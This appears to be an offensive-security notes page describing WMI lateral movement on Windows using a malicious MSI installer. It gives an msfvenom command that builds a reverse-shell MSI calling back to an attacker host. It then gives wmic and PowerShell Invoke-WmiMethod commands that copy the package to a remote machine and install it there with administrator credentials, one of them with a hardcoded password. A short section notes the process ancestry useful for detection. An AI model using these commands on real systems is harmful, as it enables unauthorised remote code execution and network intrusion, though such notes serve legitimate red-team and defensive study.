Skip to content

Latest commit

 

History

History
79 lines (51 loc) · 2.66 KB

File metadata and controls

79 lines (51 loc) · 2.66 KB
description
WMI lateral movement with .msi packages

WMI + MSI Lateral Movement

Execution

Generating malicious payload in MSI (Microsoft Installer Package):

{% code title="attacker@local" %}

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f msi > evil64.msi

{% endcode %}

I tried executing the .msi payload like so, but got a return code 1619 and a quick search on google returned nothing useful:

{% code title="attacker@remote" %}

wmic /node:10.0.0.7 /user:offense\administrator product call install PackageLocation='\\10.0.0.2\c$\experiments\evil64.msi'

{% endcode %}

I had to revert to a filthy way of achieving the goal:

{% code title="attacker@remote" %}

net use \\10.0.0.7\c$ /user:administrator@offense; copy C:\experiments\evil64.msi \\10.0.0.7\c$\PerfLogs\setup.msi ; wmic /node:10.0.0.7 /user:administrator@offense product call install PackageLocation=c:\PerfLogs\setup.msi

{% endcode %}

Additionally, the same could of be achieved using powershell cmdlets:

{% code title="attacker@remote" %}

Invoke-WmiMethod -Path win32_product -name install -argumentlist @($true,"","c:\PerfLogs\setup.msi") -ComputerName pc-w10 -Credential (Get-Credential)

{% endcode %}

Get a prompt for credentials:

and enjoy the code execution:

Or if no GUI is available for credentials, a oneliner:

{% code title="attacker@remote" %}

$username = 'Administrator';$password = '123456';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Invoke-WmiMethod -Path win32_product -name install -argumentlist @($true,"","c:\PerfLogs\setup.msi") -ComputerName pc-w10 -Credential $credential

{% endcode %}

Observations

Note the process ancestry: services > msiexec.exe > .tmp > cmd.exe:

and that the connection is initiated by the .tmp file (I ran another test, hence another file name):

References

{% embed url="https://www.cybereason.com/blog/wmi-lateral-movement-win32" %}

{% embed url="https://twitter.com/buffaloverflow/status/1002523407261536256" %}